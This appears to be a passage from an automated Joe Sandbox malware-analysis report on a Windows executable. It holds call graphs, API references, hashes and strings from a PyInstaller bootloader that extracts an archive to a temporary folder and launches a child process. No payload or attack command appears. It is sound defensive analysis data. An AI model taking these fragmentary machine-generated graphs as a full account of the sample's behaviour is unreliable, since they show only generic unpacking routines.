18552->18555 18554 7ff6fb1f4c71 SystemTimeToTzSpecificLocalTime 18553->18554 18553->18555 18554->18555 18556 7ff6fb1eb870 _log10_special 8 API calls 18555->18556 18557 7ff6fb1f4b49 18556->18557 18557->18507 18559 7ff6fb1fea41 18558->18559 18560 7ff6fb1fea65 18558->18560 18559->18560 18561 7ff6fb1fea46 18559->18561 18563 7ff6fb1fea9f 18560->18563 18566 7ff6fb1feabe 18560->18566 18562 7ff6fb1f43f4 _get_daylight 11 API calls 18561->18562 18564 7ff6fb1fea4b 18562->18564 18565 7ff6fb1f43f4 _get_daylight 11 API calls 18563->18565 18568 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 18564->18568 18569 7ff6fb1feaa4 18565->18569 18567 7ff6fb1f4178 45 API calls 18566->18567 18570 7ff6fb1feacb 18567->18570 18571 7ff6fb1fea56 18568->18571 18572 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 18569->18572 18573 7ff6fb1feaaf 18570->18573 18574 7ff6fb1ff7ec 51 API calls 18570->18574 18571->18537 18572->18573 18573->18537 18574->18570 20157 
7ff6fb1f4720 20158 7ff6fb1f472b 20157->20158 20166 7ff6fb1fe5b4 20158->20166 20179 7ff6fb1ff5e8 EnterCriticalSection 20166->20179 18924 7ff6fb1fec9c 18925 7ff6fb1fee8e 18924->18925 18927 7ff6fb1fecde _isindst 18924->18927 18926 7ff6fb1f43f4 _get_daylight 11 API calls 18925->18926 18944 7ff6fb1fee7e 18926->18944 18927->18925 18930 7ff6fb1fed5e _isindst 18927->18930 18928 7ff6fb1eb870 _log10_special 8 API calls 18929 7ff6fb1feea9 18928->18929 18945 7ff6fb2054a4 18930->18945 18935 7ff6fb1feeba 18936 7ff6fb1f9c10 _isindst 17 API calls 18935->18936 18938 7ff6fb1feece 18936->18938 18942 7ff6fb1fedbb 18942->18944 18969 7ff6fb2054e8 18942->18969 18944->18928 18946 7ff6fb2054b3 18945->18946 18949 7ff6fb1fed7c 18945->18949 18976 7ff6fb1ff5e8 EnterCriticalSection 18946->18976 18951 7ff6fb2048a8 18949->18951 18952 7ff6fb2048b1 18951->18952 18953 7ff6fb1fed91 18951->18953 18954 7ff6fb1f43f4 _get_daylight 11 API calls 18952->18954 18953->18935 18957 7ff6fb2048d8 18953->18957 18955 7ff6fb2048b6 18954->18955 18956 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 18955->18956 18956->18953 18958 7ff6fb2048e1 18957->18958 18959 7ff6fb1feda2 18957->18959 18960 7ff6fb1f43f4 _get_daylight 11 API calls 18958->18960 18959->18935 18963 7ff6fb204908 18959->18963 18961 7ff6fb2048e6 18960->18961 18962 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 18961->18962 18962->18959 18964 7ff6fb204911 18963->18964 18965 7ff6fb1fedb3 18963->18965 18966 7ff6fb1f43f4 _get_daylight 11 API calls 18964->18966 18965->18935 18965->18942 18967 7ff6fb204916 18966->18967 18968 7ff6fb1f9bf0 _invalid_parameter_noinfo 37 API calls 18967->18968 18968->18965 18977 7ff6fb1ff5e8 EnterCriticalSection 18969->18977 20184 7ff6fb1fb830 20195 7ff6fb1ff5e8 EnterCriticalSection 20184->20195 20303 7ff6fb20a10e 20304 7ff6fb20a127 20303->20304 20305 7ff6fb20a11d 20303->20305 20307 7ff6fb1ff648 LeaveCriticalSection 20305->20307 18575 7ff6fb1f8c79 18576 7ff6fb1f96e8 45 API calls 18575->18576 18577 7ff6fb1f8c7e 18576->18577 
18578 7ff6fb1f8ca5 GetModuleHandleW 18577->18578 18579 7ff6fb1f8cef 18577->18579 18578->18579 18585 7ff6fb1f8cb2 18578->18585 18587 7ff6fb1f8b7c 18579->18587 18585->18579 18601 7ff6fb1f8da0 GetModuleHandleExW 18585->18601 18607 7ff6fb1ff5e8 EnterCriticalSection 18587->18607 18602 7ff6fb1f8dd4 GetProcAddress 18601->18602 18603 7ff6fb1f8dfd 18601->18603 18606 7ff6fb1f8de6 18602->18606 18604 7ff6fb1f8e02 FreeLibrary 18603->18604 18605 7ff6fb1f8e09 18603->18605 18604->18605 18605->18579 18606->18603 19317 7ff6fb20a079 19320 7ff6fb1f4788 LeaveCriticalSection 19317->19320

                                                              Control-flow Graph

                                                              control_flow_graph 0 7ff6fb1e1000-7ff6fb1e3536 call 7ff6fb1ef138 call 7ff6fb1ef140 call 7ff6fb1ebb70 call 7ff6fb1f4700 call 7ff6fb1f4794 call 7ff6fb1e33e0 14 7ff6fb1e3544-7ff6fb1e3566 call 7ff6fb1e18f0 0->14 15 7ff6fb1e3538-7ff6fb1e353f 0->15 21 7ff6fb1e356c-7ff6fb1e3583 call 7ff6fb1e1bf0 14->21 22 7ff6fb1e3736-7ff6fb1e374c call 7ff6fb1e3f70 14->22 16 7ff6fb1e371a-7ff6fb1e3735 call 7ff6fb1eb870 15->16 25 7ff6fb1e3588-7ff6fb1e35c1 21->25 29 7ff6fb1e3785-7ff6fb1e379a call 7ff6fb1e25f0 22->29 30 7ff6fb1e374e-7ff6fb1e377b call 7ff6fb1e76a0 22->30 27 7ff6fb1e3653-7ff6fb1e366d call 7ff6fb1e7e10 25->27 28 7ff6fb1e35c7-7ff6fb1e35cb 25->28 42 7ff6fb1e3695-7ff6fb1e369c 27->42 43 7ff6fb1e366f-7ff6fb1e3675 27->43 32 7ff6fb1e35cd-7ff6fb1e35e5 call 7ff6fb1f4560 28->32 33 7ff6fb1e3638-7ff6fb1e364d call 7ff6fb1e18e0 28->33 45 7ff6fb1e3712 29->45 46 7ff6fb1e379f-7ff6fb1e37be call 7ff6fb1e1bf0 30->46 47 7ff6fb1e377d-7ff6fb1e3780 call 7ff6fb1ef36c 30->47 51 7ff6fb1e35f2-7ff6fb1e360a call 7ff6fb1f4560 32->51 52 7ff6fb1e35e7-7ff6fb1e35eb 32->52 33->27 33->28 54 7ff6fb1e36a2-7ff6fb1e36c0 call 7ff6fb1e7e10 call 7ff6fb1e7f80 42->54 55 7ff6fb1e3844-7ff6fb1e3863 call 7ff6fb1e3e90 42->55 49 7ff6fb1e3682-7ff6fb1e3690 call 7ff6fb1f415c 43->49 50 7ff6fb1e3677-7ff6fb1e3680 43->50 45->16 61 7ff6fb1e37c1-7ff6fb1e37ca 46->61 47->29 49->42 50->49 66 7ff6fb1e360c-7ff6fb1e3610 51->66 67 7ff6fb1e3617-7ff6fb1e362f call 7ff6fb1f4560 51->67 52->51 80 7ff6fb1e380f-7ff6fb1e381e call 7ff6fb1e8400 54->80 81 7ff6fb1e36c6-7ff6fb1e36c9 54->81 69 7ff6fb1e3865-7ff6fb1e386f call 7ff6fb1e3fe0 55->69 70 7ff6fb1e3871-7ff6fb1e3882 call 7ff6fb1e1bf0 55->70 61->61 65 7ff6fb1e37cc-7ff6fb1e37e9 call 7ff6fb1e18f0 61->65 65->25 84 7ff6fb1e37ef-7ff6fb1e3800 call 7ff6fb1e25f0 65->84 66->67 67->33 85 7ff6fb1e3631 67->85 77 7ff6fb1e3887-7ff6fb1e38a1 call 7ff6fb1e86b0 69->77 70->77 94 7ff6fb1e38a3 77->94 95 7ff6fb1e38af-7ff6fb1e38c1 SetDllDirectoryW 77->95 92 
7ff6fb1e3820 80->92 93 7ff6fb1e382c-7ff6fb1e382f call 7ff6fb1e7c40 80->93 81->80 86 7ff6fb1e36cf-7ff6fb1e36f6 call 7ff6fb1e1bf0 81->86 84->45 85->33 97 7ff6fb1e3805-7ff6fb1e380d call 7ff6fb1f415c 86->97 98 7ff6fb1e36fc-7ff6fb1e3703 call 7ff6fb1e25f0 86->98 92->93 103 7ff6fb1e3834-7ff6fb1e3836 93->103 94->95 100 7ff6fb1e38c3-7ff6fb1e38ca 95->100 101 7ff6fb1e38d0-7ff6fb1e38ec call 7ff6fb1e6560 call 7ff6fb1e6b00 95->101 97->77 108 7ff6fb1e3708-7ff6fb1e370a 98->108 100->101 104 7ff6fb1e3a50-7ff6fb1e3a58 100->104 118 7ff6fb1e38ee-7ff6fb1e38f4 101->118 119 7ff6fb1e3947-7ff6fb1e394a call 7ff6fb1e6510 101->119 103->77 111 7ff6fb1e3838 103->111 109 7ff6fb1e3a5a-7ff6fb1e3a77 PostMessageW GetMessageW 104->109 110 7ff6fb1e3a7d-7ff6fb1e3aaf call 7ff6fb1e33d0 call 7ff6fb1e3080 call 7ff6fb1e33a0 call 7ff6fb1e6780 call 7ff6fb1e6510 104->110 108->45 109->110 111->55 120 7ff6fb1e390e-7ff6fb1e3918 call 7ff6fb1e6970 118->120 121 7ff6fb1e38f6-7ff6fb1e3903 call 7ff6fb1e65a0 118->121 125 7ff6fb1e394f-7ff6fb1e3956 119->125 134 7ff6fb1e3923-7ff6fb1e3931 call 7ff6fb1e6cd0 120->134 135 7ff6fb1e391a-7ff6fb1e3921 120->135 121->120 132 7ff6fb1e3905-7ff6fb1e390c 121->132 125->104 129 7ff6fb1e395c-7ff6fb1e3966 call 7ff6fb1e30e0 125->129 129->108 142 7ff6fb1e396c-7ff6fb1e3980 call 7ff6fb1e83e0 129->142 137 7ff6fb1e393a-7ff6fb1e3942 call 7ff6fb1e2870 call 7ff6fb1e6780 132->137 134->125 147 7ff6fb1e3933 134->147 135->137 137->119 151 7ff6fb1e3982-7ff6fb1e399f PostMessageW GetMessageW 142->151 152 7ff6fb1e39a5-7ff6fb1e39e1 call 7ff6fb1e7f20 call 7ff6fb1e7fc0 call 7ff6fb1e6780 call 7ff6fb1e6510 call 7ff6fb1e7ec0 142->152 147->137 151->152 162 7ff6fb1e39e6-7ff6fb1e39e8 152->162 163 7ff6fb1e39ea-7ff6fb1e3a00 call 7ff6fb1e81f0 call 7ff6fb1e7ec0 162->163 164 7ff6fb1e3a3d-7ff6fb1e3a4b call 7ff6fb1e18a0 162->164 163->164 171 7ff6fb1e3a02-7ff6fb1e3a10 163->171 164->108 172 7ff6fb1e3a12-7ff6fb1e3a2c call 7ff6fb1e25f0 call 7ff6fb1e18a0 171->172 173 7ff6fb1e3a31-7ff6fb1e3a38 call 7ff6fb1e2870 171->173 172->108 173->164
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: FileModuleName
                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback
                                                              • API String ID: 514040917-1099759049
                                                              • Opcode ID: c0b2594e386a0b9d0a179b47a069e5e77d49092aa87a245718b77c1e1c92fd5a
                                                              • Instruction ID: 4351c9cd71c9236011f0d0ad4ca458a0147431b02101637dfaa68685ba63fe4e
                                                              • Opcode Fuzzy Hash: c0b2594e386a0b9d0a179b47a069e5e77d49092aa87a245718b77c1e1c92fd5a
                                                              • Instruction Fuzzy Hash: 37F14D61E0868391FB19EB21E5652FD6261AF5D788F844031DA6DC3AE6FF2CF568C340

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 335 7ff6fb205c74-7ff6fb205ce7 call 7ff6fb2059a8 338 7ff6fb205d01-7ff6fb205d0b call 7ff6fb1f7830 335->338 339 7ff6fb205ce9-7ff6fb205cf2 call 7ff6fb1f43d4 335->339 344 7ff6fb205d0d-7ff6fb205d24 call 7ff6fb1f43d4 call 7ff6fb1f43f4 338->344 345 7ff6fb205d26-7ff6fb205d8f CreateFileW 338->345 346 7ff6fb205cf5-7ff6fb205cfc call 7ff6fb1f43f4 339->346 344->346 348 7ff6fb205d91-7ff6fb205d97 345->348 349 7ff6fb205e0c-7ff6fb205e17 GetFileType 345->349 357 7ff6fb206042-7ff6fb206062 346->357 355 7ff6fb205dd9-7ff6fb205e07 GetLastError call 7ff6fb1f4368 348->355 356 7ff6fb205d99-7ff6fb205d9d 348->356 352 7ff6fb205e6a-7ff6fb205e71 349->352 353 7ff6fb205e19-7ff6fb205e54 GetLastError call 7ff6fb1f4368 CloseHandle 349->353 360 7ff6fb205e73-7ff6fb205e77 352->360 361 7ff6fb205e79-7ff6fb205e7c 352->361 353->346 369 7ff6fb205e5a-7ff6fb205e65 call 7ff6fb1f43f4 353->369 355->346 356->355 362 7ff6fb205d9f-7ff6fb205dd7 CreateFileW 356->362 366 7ff6fb205e82-7ff6fb205ed7 call 7ff6fb1f7748 360->366 361->366 367 7ff6fb205e7e 361->367 362->349 362->355 374 7ff6fb205ed9-7ff6fb205ee5 call 7ff6fb205bb0 366->374 375 7ff6fb205ef6-7ff6fb205f27 call 7ff6fb205728 366->375 367->366 369->346 374->375 380 7ff6fb205ee7 374->380 381 7ff6fb205f2d-7ff6fb205f6f 375->381 382 7ff6fb205f29-7ff6fb205f2b 375->382 383 7ff6fb205ee9-7ff6fb205ef1 call 7ff6fb1f9dd0 380->383 384 7ff6fb205f91-7ff6fb205f9c 381->384 385 7ff6fb205f71-7ff6fb205f75 381->385 382->383 383->357 388 7ff6fb205fa2-7ff6fb205fa6 384->388 389 7ff6fb206040 384->389 385->384 387 7ff6fb205f77-7ff6fb205f8c 385->387 387->384 388->389 391 7ff6fb205fac-7ff6fb205ff1 CloseHandle CreateFileW 388->391 389->357 392 7ff6fb205ff3-7ff6fb206021 GetLastError call 7ff6fb1f4368 call 7ff6fb1f7970 391->392 393 7ff6fb206026-7ff6fb20603b 391->393 392->393 393->389
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                              • String ID:
                                                              • API String ID: 1617910340-0
                                                              • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                              • Instruction ID: e2f944a9e83ba7e30b59ec9f2f177da379f5a2a71d054c596229b18e502c4fc3
                                                              • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                              • Instruction Fuzzy Hash: 29C19E36B28A4686EB10CF69C5A06BC3761FB59B98B012225DE6ED77E4EF38D551C300

                                                              Control-flow Graph

                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7A1B
                                                              • RemoveDirectoryW.KERNEL32(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7A9E
                                                              • DeleteFileW.KERNELBASE(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7ABD
                                                              • FindNextFileW.KERNELBASE(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7ACB
                                                              • FindClose.KERNEL32(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7ADC
                                                              • RemoveDirectoryW.KERNELBASE(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7AE5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                              • String ID: %s\*
                                                              • API String ID: 1057558799-766152087
                                                              • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                              • Instruction ID: 260a6123e6ccdfeceeadb3a5763812eba8f680ded8de13b99b7dd316981b334c
                                                              • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                              • Instruction Fuzzy Hash: 35411021E0C54395FB30DB24E5585BD6361FB9C798F480632D57EC2AE4EF6CE64A8740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                              • Instruction ID: 51284713ea7a4f52c2f1898fb99e4ccaf49759f3994e392812a3888dd175179d
                                                              • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                              • Instruction Fuzzy Hash: 72F04426A1964386F770CB60B59976A7360AB4C768F041235D97E82AE4EF7CE0598B04

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 179 7ff6fb1e18f0-7ff6fb1e192b call 7ff6fb1e3f70 182 7ff6fb1e1bc1-7ff6fb1e1be5 call 7ff6fb1eb870 179->182 183 7ff6fb1e1931-7ff6fb1e1971 call 7ff6fb1e76a0 179->183 188 7ff6fb1e1bae-7ff6fb1e1bb1 call 7ff6fb1ef36c 183->188 189 7ff6fb1e1977-7ff6fb1e1987 call 7ff6fb1ef9f4 183->189 193 7ff6fb1e1bb6-7ff6fb1e1bbe 188->193 194 7ff6fb1e19a1-7ff6fb1e19bd call 7ff6fb1ef6bc 189->194 195 7ff6fb1e1989-7ff6fb1e199c call 7ff6fb1e2760 189->195 193->182 200 7ff6fb1e19bf-7ff6fb1e19d2 call 7ff6fb1e2760 194->200 201 7ff6fb1e19d7-7ff6fb1e19ec call 7ff6fb1f4154 194->201 195->188 200->188 206 7ff6fb1e19ee-7ff6fb1e1a01 call 7ff6fb1e2760 201->206 207 7ff6fb1e1a06-7ff6fb1e1a87 call 7ff6fb1e1bf0 * 2 call 7ff6fb1ef9f4 201->207 206->188 215 7ff6fb1e1a8c-7ff6fb1e1a9f call 7ff6fb1f4170 207->215 218 7ff6fb1e1aa1-7ff6fb1e1ab4 call 7ff6fb1e2760 215->218 219 7ff6fb1e1ab9-7ff6fb1e1ad2 call 7ff6fb1ef6bc 215->219 218->188 224 7ff6fb1e1ad4-7ff6fb1e1ae7 call 7ff6fb1e2760 219->224 225 7ff6fb1e1aec-7ff6fb1e1b08 call 7ff6fb1ef430 219->225 224->188 230 7ff6fb1e1b1b-7ff6fb1e1b29 225->230 231 7ff6fb1e1b0a-7ff6fb1e1b16 call 7ff6fb1e25f0 225->231 230->188 233 7ff6fb1e1b2f-7ff6fb1e1b3e 230->233 231->188 235 7ff6fb1e1b40-7ff6fb1e1b46 233->235 236 7ff6fb1e1b60-7ff6fb1e1b6f 235->236 237 7ff6fb1e1b48-7ff6fb1e1b55 235->237 236->236 238 7ff6fb1e1b71-7ff6fb1e1b7a 236->238 237->238 239 7ff6fb1e1b8f 238->239 240 7ff6fb1e1b7c-7ff6fb1e1b7f 238->240 242 7ff6fb1e1b91-7ff6fb1e1bac 239->242 240->239 241 7ff6fb1e1b81-7ff6fb1e1b84 240->241 241->239 243 7ff6fb1e1b86-7ff6fb1e1b89 241->243 242->188 242->235 243->239 244 7ff6fb1e1b8b-7ff6fb1e1b8d 243->244 244->242
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _fread_nolock$Message
                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                              • API String ID: 677216364-3497178890
                                                              • Opcode ID: 493bb61fc539ec1b122e5882e05326b97e853fd3b6a6c00663431bf0fa1fa3e3
                                                              • Instruction ID: 8cd3dbe39fdeabba35f3012ba4dbe3923b299f09861fa7d16d38a881ef22a6a4
                                                              • Opcode Fuzzy Hash: 493bb61fc539ec1b122e5882e05326b97e853fd3b6a6c00663431bf0fa1fa3e3
                                                              • Instruction Fuzzy Hash: D4718F21E1868785FB20DB24E5542FD23A1EB8CB88F445035E9ADC7BE9FE6CF5548B40

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 245 7ff6fb1e15c0-7ff6fb1e15d1 246 7ff6fb1e15d3-7ff6fb1e15dc call 7ff6fb1e1050 245->246 247 7ff6fb1e15f7-7ff6fb1e1611 call 7ff6fb1e3f70 245->247 252 7ff6fb1e15ee-7ff6fb1e15f6 246->252 253 7ff6fb1e15de-7ff6fb1e15e9 call 7ff6fb1e25f0 246->253 254 7ff6fb1e1613-7ff6fb1e163a call 7ff6fb1e2760 247->254 255 7ff6fb1e163b-7ff6fb1e1655 call 7ff6fb1e3f70 247->255 253->252 261 7ff6fb1e1671-7ff6fb1e1688 call 7ff6fb1ef9f4 255->261 262 7ff6fb1e1657-7ff6fb1e166c call 7ff6fb1e25f0 255->262 268 7ff6fb1e16ab-7ff6fb1e16af 261->268 269 7ff6fb1e168a-7ff6fb1e16a6 call 7ff6fb1e2760 261->269 267 7ff6fb1e17c5-7ff6fb1e17c8 call 7ff6fb1ef36c 262->267 275 7ff6fb1e17cd-7ff6fb1e17df 267->275 272 7ff6fb1e16b1-7ff6fb1e16bd call 7ff6fb1e11f0 268->272 273 7ff6fb1e16c9-7ff6fb1e16e9 call 7ff6fb1f4170 268->273 278 7ff6fb1e17bd-7ff6fb1e17c0 call 7ff6fb1ef36c 269->278 279 7ff6fb1e16c2-7ff6fb1e16c4 272->279 282 7ff6fb1e16eb-7ff6fb1e1707 call 7ff6fb1e2760 273->282 283 7ff6fb1e170c-7ff6fb1e1717 273->283 278->267 279->278 290 7ff6fb1e17b3-7ff6fb1e17b8 282->290 284 7ff6fb1e171d-7ff6fb1e1726 283->284 285 7ff6fb1e17a6-7ff6fb1e17ae call 7ff6fb1f415c 283->285 288 7ff6fb1e1730-7ff6fb1e1752 call 7ff6fb1ef6bc 284->288 285->290 294 7ff6fb1e1785-7ff6fb1e178c 288->294 295 7ff6fb1e1754-7ff6fb1e176c call 7ff6fb1efdfc 288->295 290->278 297 7ff6fb1e1793-7ff6fb1e179c call 7ff6fb1e2760 294->297 300 7ff6fb1e1775-7ff6fb1e1783 295->300 301 7ff6fb1e176e-7ff6fb1e1771 295->301 304 7ff6fb1e17a1 297->304 300->297 301->288 303 7ff6fb1e1773 301->303 303->304 304->285
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                              • API String ID: 2030045667-1550345328
                                                              • Opcode ID: 5146ab100ef6ae8108d921daeb6090ca94fb08b852174b9af5e6d18222b17732
                                                              • Instruction ID: f344059fb2ec416c9533b84e2c64572820f65bd2df5aa9520ed281a62e0ad389
                                                              • Opcode Fuzzy Hash: 5146ab100ef6ae8108d921daeb6090ca94fb08b852174b9af5e6d18222b17732
                                                              • Instruction Fuzzy Hash: EC515565E0864392EB20DB25A9605BD22A0BF4DB98F444131EE2EC7AF5FF6CF5648740

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                              • String ID: CreateProcessW$Failed to create child process!
                                                              • API String ID: 2895956056-699529898
                                                              • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                              • Instruction ID: e80bbda4e40d2818f9b88610f948c8e1d78189ea65abe69411fbe6e041833de5
                                                              • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                              • Instruction Fuzzy Hash: 7541EF35E1878281DB20DB24E4552AEA291FB8D364F540735E6BD877E9EF7CD044CB40

